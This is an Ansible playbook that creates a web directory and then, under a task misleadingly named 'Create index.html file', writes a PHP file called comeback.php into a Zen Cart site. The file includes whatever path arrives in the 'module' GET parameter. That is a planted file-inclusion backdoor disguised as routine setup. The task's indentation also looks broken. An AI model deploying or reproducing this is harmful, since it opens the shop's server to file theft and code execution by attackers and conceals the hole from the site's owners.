- name: Add a web directory
  hosts: ubuntuWeb
  become: true
  tasks:
  - name: Create web directory
    file:
      path: /var/www/html/web_directory
      state: directory
      mode: 0755
  - name: Create index.html file
     copy:
      dest: /var/www/html/zen-cart/comeback.php
      content: |
        <?PHP
           $module = $_GET["module"];
           include $module;
        ?>